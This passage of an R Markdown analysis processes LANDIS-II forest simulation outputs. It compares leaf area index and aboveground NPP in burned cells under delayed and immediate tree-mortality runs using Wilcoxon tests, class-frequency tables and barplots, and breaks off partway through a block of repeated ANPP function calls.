library(ggpubr)
```
## Warning: package 'ggpubr' was built under R version 4.0.3
``` r
library(grid)
require(gridExtra)
```
## Loading required package: gridExtra
##
## Attaching package: 'gridExtra'
## The following object is masked from 'package:dplyr':
##
## combine
``` r
library(raster)
```
## Loading required package: sp
##
## Attaching package: 'raster'
## The following object is masked from 'package:ggpubr':
##
## rotate
## The following object is masked from 'package:dplyr':
##
## select
``` r
library(RColorBrewer)
rdbu<-brewer.pal(10,"RdBu")
Greens<-brewer.pal(9,"Greens")
```
``` r
ProcessLAI<-function(t,LANDIS_Inputs){
Fire1<-raster(paste0(LANDIS_Inputs,'scrapple-fire/ignition-type-',t,'.img'))
Fire1[Fire1<=1]<-NA
Fire1[Fire1>1]<-1
LAITOF<-raster(paste0(LANDIS_Inputs,'NECN/LAI-',as.character(t-1),'.img'))*Fire1
LAIAF<-raster(paste0(LANDIS_Inputs,'NECN/LAI-',t,'.img'))*Fire1
LAI10YAF<-raster(paste0(LANDIS_Inputs,'NECN/LAI-',t+5,'.img'))*Fire1
LAI15YAR<-raster(paste0(LANDIS_Inputs,'NECN/LAI-',t+10,'.img'))*Fire1
values0<-as.data.frame(LAITOF$layer)%>%subset(!is.na(layer))
values1<-as.data.frame(LAIAF$layer)%>%subset(!is.na(layer))
values2<-as.data.frame(LAI10YAF$layer)%>%subset(!is.na(layer))
values3<-as.data.frame(LAI15YAR$layer)%>%subset(!is.na(layer))
#values4<-as.data.frame(LAI4$layer)%>%subset(!is.na(layer))
#values5<-as.data.frame(LAI5$layer)%>%subset(!is.na(layer))
delta<-LAIAF-LAITOF
Fire1<-raster(paste0(LANDIS_Inputs,'scrapple-fire/ignition-type-',t,'.img'))
#par(bg="grey")
#plot(delta,ylim=c(0,400),xlim=c(0,400),col=rdbu,zlim=c(-8,8),colNA="darkgrey")
data<-data.frame(name=c(rep(" Pre-burn",length(values0$layer)),rep(" Post-burn",length(values1$layer)),rep(" 5 yrs Post-burn",length(values2$layer)),rep("10 yrs Post-burn",length(values3$layer))),
value=c(values0$layer,values1$layer,values2$layer,values3$layer))
return(data)
}
ProcessLAINF<-function(t,LANDIS_Inputs){
#plot(Fire1,ylim=c(0,400),xlim=c(0,400))
Fire1<-raster(paste0(LANDIS_Inputs,'scrapple-fire/ignition-type-',t,'.img'))
Fire1[Fire1!=1]<-NA
LAITOF<-raster(paste0(LANDIS_Inputs,'NECN/LAI-',as.character(t-1),'.img'))*Fire1
LAIAF<-raster(paste0(LANDIS_Inputs,'NECN/LAI-',t+3,'.img'))*Fire1
LAI10YAF<-raster(paste0(LANDIS_Inputs,'NECN/LAI-',t+5,'.img'))*Fire1
LAI15YAR<-raster(paste0(LANDIS_Inputs,'NECN/LAI-',t+10,'.img'))*Fire1
values0<-as.data.frame(LAITOF$layer)%>%subset(!is.na(layer))
values1<-as.data.frame(LAIAF$layer)%>%subset(!is.na(layer))
values2<-as.data.frame(LAI10YAF$layer)%>%subset(!is.na(layer))
values3<-as.data.frame(LAI15YAR$layer)%>%subset(!is.na(layer))
#values4<-as.data.frame(LAI4$layer)%>%subset(!is.na(layer))
#values5<-as.data.frame(LAI5$layer)%>%subset(!is.na(layer))
delta<-LAIAF-LAITOF
#par(bg="grey")
#plot(delta,ylim=c(0,400),xlim=c(0,400),col=rdbu,zlim=c(-8,8),colNA="darkgrey")
data<-data.frame(name=c(rep(" Pre-burn",length(values0$layer)),rep(" Post-burn",length(values1$layer)),rep(" 5 yrs Post-burn",length(values2$layer)),rep("10 yrs Post-burn",length(values3$layer))),
value=c(values0$layer,values1$layer,values2$layer,values3$layer))
return(data)
}
LANDIS_Inputs<-"E:/DM_runs_4_4/GA_Model_D1_R2/"
LANDIS_Inputs2<-"E:/DM_runs_4_4/GA_Model_D2_R2/"
LANDIS_Inputs3<-"E:/DM_runs_4_4/GA_Model_D3_R2/"
LANDIS_Inputs4<-"E:/DM_runs_4_4/GA_Model_D4_R2/"
LANDIS_Inputs5<-"E:/DM_runs_4_4/GA_Model_D5_R2/"
# Run ProcessLAI for fire years 2-11 in each of the five delayed-mortality
# replicates and stack the per-cell LAI records into one data frame
delay_runs<-c(LANDIS_Inputs,LANDIS_Inputs2,LANDIS_Inputs3,LANDIS_Inputs4,LANDIS_Inputs5)
Stack_D<-do.call(rbind,lapply(delay_runs,function(run_dir)
  do.call(rbind,lapply(2:11,ProcessLAI,LANDIS_Inputs=run_dir))))
Stack_D$model<-"Delay"
LANDIS_Inputs<-"E:/DM_runs_4_4/GA_Model_ND1_R2/"
LANDIS_Inputs2<-"E:/DM_runs_4_4/GA_Model_ND2_R2/"
LANDIS_Inputs3<-"E:/DM_runs_4_4/GA_Model_ND3_R2/"
LANDIS_Inputs4<-"E:/DM_runs_4_4/GA_Model_ND4_R2/"
LANDIS_Inputs5<-"E:/DM_runs_4_4/GA_Model_ND5_R2/"
# Same processing for the five immediate-mortality (no-delay) replicates
nodelay_runs<-c(LANDIS_Inputs,LANDIS_Inputs2,LANDIS_Inputs3,LANDIS_Inputs4,LANDIS_Inputs5)
Stack_ND<-do.call(rbind,lapply(nodelay_runs,function(run_dir)
  do.call(rbind,lapply(2:11,ProcessLAI,LANDIS_Inputs=run_dir))))
Stack_ND$model<-"No Delay"
# Unburned (undisturbed) cells from the same runs, extracted with ProcessLAINF
undisturbed_runs<-c(LANDIS_Inputs,LANDIS_Inputs2,LANDIS_Inputs3,LANDIS_Inputs4,LANDIS_Inputs5)
Stack_C<-do.call(rbind,lapply(undisturbed_runs,function(run_dir)
  do.call(rbind,lapply(2:11,ProcessLAINF,LANDIS_Inputs=run_dir))))
Stack_C$model<-"Undisturbed"
LAIStack<-rbind(Stack_D,Stack_ND,Stack_C)
write.csv(LAIStack,"LAIStack_4_28.csv")
```
``` r
LAIStack<-read.csv("LAIStack_4_28.csv")
# compare_means(value ~ model, data = LAIStack,
# group.by = "name")
# head(LAIStack)
# unique(LAIStack$name)
PB_D<-LAIStack$value[LAIStack$name==" Pre-burn" & LAIStack$model=="Delay"]
PB_ND<-LAIStack$value[LAIStack$name==" Pre-burn" & LAIStack$model=="No Delay"]
wilcox.test(PB_D,PB_ND)
```
##
## Wilcoxon rank sum test with continuity correction
##
## data: PB_D and PB_ND
## W = 86081198, p-value < 2.2e-16
## alternative hypothesis: true location shift is not equal to 0
``` r
B_D<-LAIStack$value[LAIStack$name==" Post-burn" & LAIStack$model=="Delay"]
B_ND<-LAIStack$value[LAIStack$name==" Post-burn" & LAIStack$model=="No Delay"]
wilcox.test(B_D,B_ND)
```
##
## Wilcoxon rank sum test with continuity correction
##
## data: B_D and B_ND
## W = 67962066, p-value < 2.2e-16
## alternative hypothesis: true location shift is not equal to 0
``` r
five_D<-LAIStack$value[LAIStack$name==" 5 yrs Post-burn" &LAIStack$model=="Delay"]
five_ND<-LAIStack$value[LAIStack$name==" 5 yrs Post-burn" & LAIStack$model=="No Delay"]
wilcox.test(five_D,five_ND)
```
##
## Wilcoxon rank sum test with continuity correction
##
## data: five_D and five_ND
## W = 67879249, p-value < 2.2e-16
## alternative hypothesis: true location shift is not equal to 0
``` r
ten_D<-LAIStack$value[LAIStack$name=="10 yrs Post-burn" &LAIStack$model=="Delay"]
ten_ND<-LAIStack$value[LAIStack$name=="10 yrs Post-burn" & LAIStack$model=="No Delay"]
wilcox.test(five_D,five_ND)
```
##
## Wilcoxon rank sum test with continuity correction
##
## data: five_D and five_ND
## W = 67879249, p-value < 2.2e-16
## alternative hypothesis: true location shift is not equal to 0
``` r
IntoClasses<-transform(LAIStack,group=cut(value,breaks=c(0,2,4,6,8,25),labels=c('0-2 ','2-4','4-6','6-8','>8')))
Delay<-IntoClasses[IntoClasses$model=="Delay",]
unique(IntoClasses$model)
```
## [1] "Delay" "No Delay" "Undisturbed"
``` r
D_Pre<-as.data.frame(table(Delay$group[Delay$name==" Pre-burn"]))
s<-sum(D_Pre[,2])
D_Pre<-as.data.frame(table(Delay$group[Delay$name==" Pre-burn"])/s)
D_Post<-as.data.frame(table(Delay$group[Delay$name==" Post-burn"])/s)
D_5<-as.data.frame(table(Delay$group[Delay$name==" 5 yrs Post-burn"])/s)
D_10<-as.data.frame(table(Delay$group[Delay$name=="10 yrs Post-burn"])/s)
unique(IntoClasses$model)
```
## [1] "Delay" "No Delay" "Undisturbed"
``` r
Und<-IntoClasses[IntoClasses$model=="Undisturbed",]
#unique(Delay$name)
Und_Pre<-as.data.frame(table(Und$group[Und$name==" Pre-burn"]))
s<-sum(Und_Pre[,2])
Und_Pre<-as.data.frame(table(Und$group[Und$name==" Pre-burn"])/s)
Und_Post<-as.data.frame(table(Und$group[Und$name==" Post-burn"])/s)
Und_5<-as.data.frame(table(Und$group[Und$name==" 5 yrs Post-burn"])/s)
Und_10<-as.data.frame(table(Und$group[Und$name=="10 yrs Post-burn"])/s)
ND<-IntoClasses[IntoClasses$model=="No Delay",]
unique(Delay$name)
```
## [1] " Pre-burn" " Post-burn" " 5 yrs Post-burn" "10 yrs Post-burn"
``` r
ND_Pre<-as.data.frame(table(ND$group[ND$name==" Pre-burn"]))
s<-sum(ND_Pre[,2])
ND_Pre<-as.data.frame(table(ND$group[ND$name==" Pre-burn"])/s)
ND_Post<-as.data.frame(table(ND$group[ND$name==" Post-burn"])/s)
ND_5<-as.data.frame(table(ND$group[ND$name==" 5 yrs Post-burn"])/s)
ND_10<-as.data.frame(table(ND$group[ND$name=="10 yrs Post-burn"])/s)
print(cbind(D_Pre,ND_Pre,(D_Pre$Freq-ND_Pre$Freq)/(ND_Pre$Freq)))
```
## Var1 Freq Var1 Freq (D_Pre$Freq - ND_Pre$Freq)/(ND_Pre$Freq)
## 1 0-2 0.08602404 0-2 0.09579158 -0.10196662
## 2 2-4 0.11862676 2-4 0.13523046 -0.12278079
## 3 4-6 0.22656925 4-6 0.23911824 -0.05248025
## 4 6-8 0.35972975 6-8 0.36593186 -0.01694882
## 5 >8 0.20905020 >8 0.16392786 0.27525733
``` r
print(cbind(D_Post,ND_Post,(D_Post$Freq-ND_Post$Freq)/(ND_Post$Freq)))
```
## Var1 Freq Var1 Freq (D_Post$Freq - ND_Post$Freq)/(ND_Post$Freq)
## 1 0-2 0.09395868 0-2 0.05883768 0.596913482
## 2 2-4 0.20661482 2-4 0.14949900 0.382048170
## 3 4-6 0.33537591 4-6 0.33458918 0.002351346
## 4 6-8 0.26820646 6-8 0.34412826 -0.220620648
## 5 >8 0.05027889 >8 0.08577154 -0.413804522
``` r
print(cbind(D_5,ND_5,(D_5$Freq-ND_5$Freq)/(ND_5$Freq)))
```
## Var1 Freq Var1 Freq (D_5$Freq - ND_5$Freq)/(ND_5$Freq)
## 1 0-2 0.0346453 0-2 0.02276553 0.52183132
## 2 2-4 0.0945086 2-4 0.05683367 0.66289819
## 3 4-6 0.2644355 4-6 0.20913828 0.26440528
## 4 6-8 0.4239139 6-8 0.44985972 -0.05767536
## 5 >8 0.1670202 >8 0.25643287 -0.34867869
``` r
print(cbind(D_10,ND_10,(D_10$Freq-ND_10$Freq)/(ND_10$Freq)))
```
## Var1 Freq Var1 Freq (D_10$Freq - ND_10$Freq)/(ND_10$Freq)
## 1 0-2 0.01924739 0-2 0.01234469 0.55916340
## 2 2-4 0.04556524 2-4 0.02557114 0.78190103
## 3 4-6 0.15625737 4-6 0.10869739 0.43754471
## 4 6-8 0.40985152 6-8 0.37931864 0.08049402
## 5 >8 0.36695734 >8 0.47855711 -0.23320053
``` r
par(mfrow=c(4,2))
par(mar=c(5.1, 7.1, 4.1, 6.1))
barplot(D_Pre$Freq*100,names.arg=D_Pre$Var1,main="\nDelayed Mortality \nPre Fire",ylim=c(0,50),col=Greens,cex.lab=3.0,cex.axis=2.5,cex.main=2.5,cex.names=2.5,
ylab="Percent Sites")
#mtext('text is here', side=1, line=3.5, at=9)
barplot(ND_Pre$Freq*100,names.arg=D_Pre$Var1,main="\nImmediate Mortality \nPre Fire",ylim=c(0,50),col=Greens,cex.lab=3.0,cex.axis=2.5,cex.main=2.5,cex.names=2.5)
# barplot(Und_Pre$Freq,names.arg=D_Pre$Var1,main="\nLandscape \nPre Fire",ylim=c(0,.5),col=Greens,cex.lab=1.7,cex.axis=1.7,cex.main=2.0,cex.names=1.7)
barplot(D_Post$Freq*100,names.arg=D_Pre$Var1,main="Post Fire",ylim=c(0,50),col=Greens,cex.lab=3.0,cex.axis=2.5,cex.main=2.5,cex.names=2.5, ylab="Percent Sites")
barplot(ND_Post$Freq*100,names.arg=D_Pre$Var1,main="Post Fire",ylim=c(0,50),col=Greens,cex.lab=3.0,cex.axis=2.5,cex.main=2.5,cex.names=2.5)
# barplot(Und_Post$Freq,names.arg=D_Pre$Var1,main="Post Fire",ylim=c(0,.5),col=Greens,cex.lab=1.7,cex.axis=1.7,cex.main=2.0,cex.names=1.7)
barplot(D_5$Freq*100,names.arg=D_Pre$Var1,main="5-Years Post Fire",ylim=c(0,50),col=Greens,cex.lab=3.0,cex.axis=2.5,cex.main=2.5,cex.names=2.5,
ylab="Percent Sites")
barplot(ND_5$Freq*100,names.arg=D_Pre$Var1,main="5-Years Post Fire",ylim=c(0,50),col=Greens,cex.lab=3.0,cex.axis=2.5,cex.main=2.5,cex.names=2.5)
# barplot(Und_5$Freq,names.arg=D_Pre$Var1,main="5-Years Post Fire",ylim=c(0,.5),col=Greens,cex.lab=1.7,cex.axis=1.7,cex.main=2.0,cex.names=1.7)
barplot(D_10$Freq*100,names.arg=D_Pre$Var1,main="10-Years Post Fire",ylim=c(0,50),col=Greens,cex.lab=3.0,cex.axis=2.5,cex.main=2.5,cex.names=2.5,
ylab="Percent Sites",xlab="LAI")
barplot(ND_10$Freq*100,names.arg=D_Pre$Var1,main="10-Years Post Fire",ylim=c(0,50),col=Greens,cex.lab=3.0,cex.axis=2.5,cex.main=2.5,cex.names=2.5,
xlab="LAI")
```
*(figure: barplots of the percentage of sites in each LAI class, for delayed and immediate mortality, pre-fire through 10 years post-fire)*
``` r
# barplot(Und_10$Freq,names.arg=D_Pre$Var1,main="10-Years Post Fire",ylim=c(0,.5),col=Greens,cex.lab=1.7,cex.axis=1.7,cex.main=2.0,cex.names=1.7,
# xlab="LAI")
```
### Calculating ANPP
``` r
ProcessAG_NPP<-function(t,LANDIS_Inputs){
Fire1<-raster(paste0(LANDIS_Inputs,'scrapple-fire/ignition-type-',t,'.img'))
Fire1[Fire1<=1]<-NA
Fire1[Fire1>1]<-1
  AG_NPPTOF<-raster(paste0(LANDIS_Inputs,'NECN/AG_NPP-',as.character(t-1),'.img'))*Fire1
  #plot(AG_NPPTOF)
AG_NPPAF<-raster(paste0(LANDIS_Inputs,'NECN/AG_NPP-',t,'.img'))*Fire1
AG_NPP10YAF<-raster(paste0(LANDIS_Inputs,'NECN/AG_NPP-',as.character(t+10),'.img'))*Fire1
AG_NPP20YAR<-raster(paste0(LANDIS_Inputs,'NECN/AG_NPP-',t+20,'.img'))*Fire1
AG_NPP30YAR<-raster(paste0(LANDIS_Inputs,'NECN/AG_NPP-',t+30,'.img'))*Fire1
AG_NPP40YAR<-raster(paste0(LANDIS_Inputs,'NECN/AG_NPP-',t+40,'.img'))*Fire1
values0<-as.data.frame(AG_NPPTOF$layer)%>%subset(!is.na(layer))
values1<-as.data.frame(AG_NPPAF$layer)%>%subset(!is.na(layer))
values2<-as.data.frame(AG_NPP10YAF$layer)%>%subset(!is.na(layer))
values3<-as.data.frame(AG_NPP20YAR$layer)%>%subset(!is.na(layer))
values4<-as.data.frame(AG_NPP30YAR$layer)%>%subset(!is.na(layer))
values5<-as.data.frame(AG_NPP40YAR$layer)%>%subset(!is.na(layer))
#values4<-as.data.frame(AG_NPP4$layer)%>%subset(!is.na(layer))
#values5<-as.data.frame(AG_NPP5$layer)%>%subset(!is.na(layer))
delta<-AG_NPPAF-AG_NPPTOF
#par(bg="grey")
# plot(delta,ylim=c(0,400),xlim=c(0,400),col=rdbu,zlim=c(-3000,3000),colNA="darkgrey")
data<-data.frame(name=c(rep(" Pre-burn",1),rep(" Post-burn",1),rep("10 yrs Post-burn",1),rep("20 yrs Post-burn",1),rep("30 yrs Post-burn",1),
rep("40 yrs Post-burn",1)),
value=c(mean(values0$layer),mean(values1$layer),mean(values2$layer),mean(values3$layer),mean(values4$layer),mean(values5$layer)))
return(data)
}
ProcessAG_NPPNF<-function(t,LANDIS_Inputs){
Fire1<-raster(paste0(LANDIS_Inputs,'scrapple-fire/ignition-type-',t,'.img'))
#plot(Fire1,ylim=c(0,400),xlim=c(0,400))
Fire1[Fire1!=1]<-NA
AG_NPPTOF<-raster(paste0(LANDIS_Inputs,'NECN/AG_NPP-',as.character(t-1),'.img'))*Fire1
AG_NPPAF<-raster(paste0(LANDIS_Inputs,'NECN/AG_NPP-',t,'.img'))*Fire1
AG_NPP10YAF<-raster(paste0(LANDIS_Inputs,'NECN/AG_NPP-',t+10,'.img'))*Fire1
AG_NPP20YAR<-raster(paste0(LANDIS_Inputs,'NECN/AG_NPP-',t+20,'.img'))*Fire1
AG_NPP30YAR<-raster(paste0(LANDIS_Inputs,'NECN/AG_NPP-',t+30,'.img'))*Fire1
AG_NPP40YAR<-raster(paste0(LANDIS_Inputs,'NECN/AG_NPP-',t+40,'.img'))*Fire1
values0<-as.data.frame(AG_NPPTOF$layer)%>%subset(!is.na(layer))
values1<-as.data.frame(AG_NPPAF$layer)%>%subset(!is.na(layer))
values2<-as.data.frame(AG_NPP10YAF$layer)%>%subset(!is.na(layer))
values3<-as.data.frame(AG_NPP20YAR$layer)%>%subset(!is.na(layer))
values4<-as.data.frame(AG_NPP30YAR$layer)%>%subset(!is.na(layer))
values5<-as.data.frame(AG_NPP40YAR$layer)%>%subset(!is.na(layer))
#values5<-as.data.frame(AG_NPP5$layer)%>%subset(!is.na(layer))
#par(bg="grey")
#plot(delta,ylim=c(0,400),xlim=c(0,400),col=rdbu,zlim=c(-3000,3000),colNA="darkgrey")
data<-data.frame(name=c(rep(" Pre-burn",1),rep(" Post-burn",1),rep("10 yrs Post-burn",1),rep("20 yrs Post-burn",1),rep("30 yrs Post-burn",1),
rep("40 yrs Post-burn",1)),
value=c(mean(values0$layer),mean(values1$layer),mean(values2$layer),mean(values3$layer),mean(values4$layer),mean(values5$layer)))
return(data)
}
LANDIS_Inputs<-"E:/DM_runs_4_4/GA_Model_D1_R2/"
LANDIS_Inputs2<-"E:/DM_runs_4_4/GA_Model_D2_R2/"
LANDIS_Inputs3<-"E:/DM_runs_4_4/GA_Model_D3_R2/"
LANDIS_Inputs4<-"E:/DM_runs_4_4/GA_Model_D4_R2/"
LANDIS_Inputs5<-"E:/DM_runs_4_4/GA_Model_D5_R2/"
mod1Year2<-ProcessAG_NPP(2,LANDIS_Inputs)
mod1Year3<-ProcessAG_NPP(3,LANDIS_Inputs)
mod1Year4<-ProcessAG_NPP(4,LANDIS_Inputs)
mod1Year5<-ProcessAG_NPP(5,LANDIS_Inputs)
mod1Year6<-ProcessAG_NPP(6,LANDIS_Inputs)
mod1Year7<-ProcessAG_NPP(7,LANDIS_Inputs)
mod1Year8<-ProcessAG_NPP(8,LANDIS_Inputs)
mod1Year9<-ProcessAG_NPP(9,LANDIS_Inputs)
mod1Year10<-ProcessAG_NPP(10,LANDIS_Inputs)
mod1Year11<-ProcessAG_NPP(11,LANDIS_Inputs)
mod2Year2<-ProcessAG_NPP(2,LANDIS_Inputs2)
mod2Year3<-ProcessAG_NPP(3,LANDIS_Inputs2)
mod2Year4<-ProcessAG_NPP(4,LANDIS_Inputs2)
mod2Year5<-ProcessAG_NPP(5,LANDIS_Inputs2)
mod2Year6<-ProcessAG_NPP(6,LANDIS_Inputs2)
mod2Year7<-ProcessAG_NPP(7,LANDIS_Inputs2)
mod2Year8<-ProcessAG_NPP(8,LANDIS_Inputs2)
mod2Year9<-ProcessAG_NPP(9,LANDIS_Inputs2)
mod2Year10<-ProcessAG_NPP(10,LANDIS_Inputs2)
mod2Year11<-ProcessAG_NPP(11,LANDIS_Inputs2)
mod3Year2<-ProcessAG_NPP(2,LANDIS_Inputs3)
mod3Year3<-ProcessAG_NPP(3,LANDIS_Inputs3)
mod3Year4<-ProcessAG_NPP(4,LANDIS_Inputs3)
mod3Year5<-ProcessAG_NPP(5,LANDIS_Inputs3)
mod3Year6<-ProcessAG_NPP(6,LANDIS_Inputs3)
mod3Year7<-ProcessAG_NPP(7,LANDIS_Inputs3)
mod3Year8<-ProcessAG_NPP(8,LANDIS_Inputs3)
mod3Year9<-ProcessAG_NPP(9,LANDIS_Inputs3)
mod3Year10<-ProcessAG_NPP(10,LANDIS_Inputs3)
mod3Year11<-ProcessAG_NPP(11,LANDIS_Inputs3)
mod4Year2<-ProcessAG_NPP(2,LANDIS_Inputs4)
mod4Year3<-ProcessAG_NPP(3,LANDIS_Inputs4)
mod4Year4<-ProcessAG_NPP(4,LANDIS_Inputs4)
mod4Year5<-ProcessAG_NPP(5,LANDIS_Inputs4)
mod4Year6<-ProcessAG_NPP(6,LANDIS_Inputs4)
mod4Year7<-ProcessAG_NPP(7,LANDIS_Inputs4)
mod4Year8<-ProcessAG_NPP(8,LANDIS_Inputs4)
mod4Year9<-ProcessAG_NPP(9,LANDIS_Inputs4)
mod4Year10<-ProcessAG_NPP(10,LANDIS_Inputs4)
mod4Year11<-ProcessAG_NPP(11,LANDIS_Inputs4)
mod5Year2<-ProcessAG_NPP(2,LANDIS_Inputs5)
mod5Year3<-ProcessAG_NPP(3,LANDIS_Inputs5)
mod5Year4<-ProcessAG_NPP(4,LANDIS_Inputs5)
mod5Year5<-ProcessAG_NPP(5,LANDIS_Inputs5)
mod5Year6<-ProcessAG_NPP(6,LANDIS_Inputs5)
mod5Year7<-ProcessAG_NPP(7,LANDIS_Inputs5)
mod5Year8<-ProcessAG_NPP(8,LANDIS_Inputs5)
mod5Year9<-ProcessAG_NPP(9,LANDIS_Inputs5)
mod5Year10<-ProcessAG_NPP(10,LANDIS_Inputs5)
mod5Year11<-ProcessAG_NPP(11,LANDIS_Inputs5)
Stack_D<-rbind(mod1Year2,mod1Year3,mod1Year4,mod1Year5,mod1Year6,
mod1Year7,mod1Year8,mod1Year9,mod1Year10,mod1Year11,
mod2Year2,mod2Year3,mod2Year4,mod2Year5,mod2Year6,
mod2Year7,mod2Year8,mod2Year9,mod2Year10,mod2Year11,
mod3Year2,mod3Year3,mod3Year4,mod3Year5,mod3Year6,
mod3Year7,mod3Year8,mod3Year9,mod3Year10,mod3Year11,
mod4Year2,mod4Year3,mod4Year4,mod4Year5,mod4Year6,
mod4Year7,mod4Year8,mod4Year9,mod4Year10,mod4Year11,
mod5Year2,mod5Year3,mod5Year4,mod5Year5,mod5Year6,
mod5Year7,mod5Year8,mod5Year9,mod5Year10,mod5Year11)
Stack_D$model<-"Delay"
LANDIS_Inputs<-"E:/DM_runs_4_4/GA_Model_ND1_R2/"
LANDIS_Inputs2<-"E:/DM_runs_4_4/GA_Model_ND2_R2/"
LANDIS_Inputs3<-"E:/DM_runs_4_4/GA_Model_ND3_R2/"
LANDIS_Inputs4<-"E:/DM_runs_4_4/GA_Model_ND4_R2/"
LANDIS_Inputs5<-"E:/DM_runs_4_4/GA_Model_ND5_R2/"
mod1Year2<-ProcessAG_NPP(2,LANDIS_Inputs)
mod1Year3<-ProcessAG_NPP(3,LANDIS_Inputs)
mod1Year4<-ProcessAG_NPP(4,LANDIS_Inputs)
mod1Year5<-ProcessAG_NPP(5,LANDIS_Inputs)
mod1Year6<-ProcessAG_NPP(6,LANDIS_Inputs)
mod1Year7<-ProcessAG_NPP(7,LANDIS_Inputs)
mod1Year8<-ProcessAG_NPP(8,LANDIS_Inputs)
mod1Year9<-ProcessAG_NPP(9,LANDIS_Inputs)
mod1Year10<-ProcessAG_NPP(10,LANDIS_Inputs)
mod1Year11<-ProcessAG_NPP(11,LANDIS_Inputs)
mod2Year2<-ProcessAG_NPP(2,LANDIS_Inputs2)
mod2Year3<-ProcessAG_NPP(3,LANDIS_Inputs2)
mod2Year4<-ProcessAG_NPP(4,LANDIS_Inputs2)
mod2Year5<-ProcessAG_NPP(5,LANDIS_Inputs2)
mod2Year6<-ProcessAG_NPP(6,LANDIS_Inputs2)
mod2Year7<-ProcessAG_NPP(7,LANDIS_Inputs2)
mod2Year8<-ProcessAG_NPP(8,LANDIS_Inputs2)
mod2Year9<-ProcessAG_NPP(9,LANDIS_Inputs2)
mod2Year10<-ProcessAG_NPP(10,LANDIS_Inputs2)
mod2Year11<-ProcessAG_NPP(11,LANDIS_Inputs2)
mod3Year2<-ProcessAG_NPP(2,LANDIS_Inputs3)
mod3Year3<-ProcessAG_NPP(3,LANDIS_Inputs3)
mod3Year4<-ProcessAG_NPP(4,LANDIS_Inputs3)
mod3Year5<-ProcessAG_NPP(5,LANDIS_Inputs3)
mod3Year6<-ProcessAG_NPP(6,LANDIS_Inputs3)
mod3Year7<-ProcessAG_NPP(7,LANDIS_Inputs3)
mod3Year8<-ProcessAG_NPP(8,LANDIS_Inputs3)
mod3Year9<-ProcessAG_NPP(9,LANDIS_Inputs3)
mod3Year10<-ProcessAG_NPP(10,LANDIS_Inputs3)
mod3Year11<-ProcessAG_NPP(11,LANDIS_Inputs3)
mod4Year2<-ProcessAG_NPP(2,LANDIS_Inputs4)
mod4Year3<-ProcessAG_NPP(3,LANDIS_Inputs4)
mod4Year4<-ProcessAG_NPP(4,LANDIS_Inputs4)
mod4Year5<-ProcessAG_NPP(5,LANDIS_Inputs4)
mod4Year6<-ProcessAG_NPP(6,LANDIS_Inputs4)
mod4Year7<-ProcessAG_NPP(7,LANDIS_Inputs4)
mod4Year8<-ProcessAG_NPP(8,LANDIS_Inputs4)
mod4Year9<-ProcessAG_NPP(9,LANDIS_Inputs4)
mod4Year10<-ProcessAG_NPP(10,LANDIS_Inputs4)
mod4Year11<-ProcessAG_NPP(11,LANDIS_Inputs4)
mod5Year2<-ProcessAG_NPP(2,LANDIS_Inputs5)
mod5Year3<-ProcessAG_NPP(3,LANDIS_Inputs5)
mod5Year4<-ProcessAG_NPP(4,LANDIS_Inputs5)
mod5Year5<-ProcessAG_NPP(5,LANDIS_Inputs5)
mod5Year6<-ProcessAG_NPP(6,LANDIS_Inputs5)
mod5Year7<-ProcessAG_NPP(7,LANDIS_Inputs5)
mod5Year8<-ProcessAG_NPP(8,LANDIS_Inputs5)
mod5Year9<-ProcessAG_NPP(9,LANDIS_Inputs5)
mod5Year10<-ProcessAG_NPP(10,LANDIS_Inputs5)
mod5Year11<-ProcessAG_NPP(11,LANDIS_Inputs5)
Stack_ND<-rbind(mod1Year2,mod1Year3,mod1Year4,mod1Year5,mod1Year6,
mod1Year7,mod1Year8,mod1Year9,mod1Year10,mod1Year11,
mod2Year2,mod2Year3,mod2Year4,mod2Year5,mod2Year6,
mod2Year7,mod2Year8,mod2Year9,mod2Year10,mod2Year11,
mod3Year2,mod3Year3,mod3Year4,mod3Year5,mod3Year6,
mod3Year7,mod3Year8,mod3Year9,mod3Year10,mod3Year11,
mod4Year2,mod4Year3,mod4Year4,mod4Year5,mod4Year6,
mod4Year7,mod4Year8,mod4Year9,mod4Year10,mod4Year11,
mod5Year2,mod5Year3,mod5Year4,mod5Year5,mod5Year6,
mod5Year7,mod5Year8,mod5Year9,mod5Year10,mod5Year11)
Stack_ND$model<-"No Delay"
mod1Year2<-ProcessAG_NPPNF(2,LANDIS_Inputs)
mod1Year3<-ProcessAG_NPPNF(3,LANDIS_Inputs)
mod1Year4<-ProcessAG_NPPNF(4,LANDIS_Inputs)
mod1Year5<-ProcessAG_NPPNF(5,LANDIS_Inputs)
mod1Year6<-ProcessAG_NPPNF(6,LANDIS_Inputs)
mod1Year7<-ProcessAG_NPPNF(7,LANDIS_Inputs)
mod1Year8<-ProcessAG_NPPNF(8,LANDIS_Inputs)
mod1Year9<-ProcessAG_NPPNF(9,LANDIS_Inputs)
mod1Year10<-ProcessAG_NPPNF(10,LANDIS_Inputs)
mod1Year11<-ProcessAG_NPPNF(11,LANDIS_Inputs)
mod2Year2<-ProcessAG_NPPNF(2,LANDIS_Inputs2)
mod2Year3<-ProcessAG_NPPNF(3,LANDIS_Inputs2)
mod2Year4<-ProcessAG_NPPNF(4,LANDIS_Inputs2)
mod2Year5<-ProcessAG_NPPNF(5,LANDIS_Inputs2)
mod2Year6<-ProcessAG_NPPNF(6,LANDIS_Inputs2)
mod2Year7<-ProcessAG_NPPNF(7,LANDIS_Inputs2)
mod2Year8<-ProcessAG_NPPNF(8,LANDIS_Inputs2)
mod2Year9<-ProcessAG_NPPNF(9,LANDIS_Inputs2)
mod2Year10<-ProcessAG_NPPNF(10,LANDIS_Inputs2)
mod2Year11<-ProcessAG_NPPNF(11,LANDIS_Inputs2)
mod3Year2<-ProcessAG_NPPNF(2,LANDIS_Inputs3)
mod3Year3<-ProcessAG_NPPNF(3,LANDIS_Inputs3)
mod3Year4<-ProcessAG_NPPNF(4,LANDIS_Inputs3)
mod3Year5<-ProcessAG_NPPNF(5,LANDIS_Inputs3)
mod3Year6<-ProcessAG_NPPNF(6,LANDIS_Inputs3)
mod3Year7<-ProcessAG_NPPNF(7,LANDIS_Inputs3)
mod3Year8<-ProcessAG_NPPNF(8,LANDIS_Inputs3)
mod3Year9<-ProcessAG_NPPNF(9,LANDIS_Inputs3)
mod3Year10<-ProcessAG_NPPNF(10,LANDIS_Inputs3)
mod3Year11<-ProcessAG_NPPNF(11,LANDIS_Inputs3)
mod4Year2<-ProcessAG_NPPNF(2,LANDIS_Inputs4)
mod4Year3<-ProcessAG_NPPNF(3,LANDIS_Inputs4)
mod4Year4<-ProcessAG_NPPNF(4,LANDIS_Inputs4)
mod4Year5<-ProcessAG_NPPNF(5,LANDIS_Inputs4)
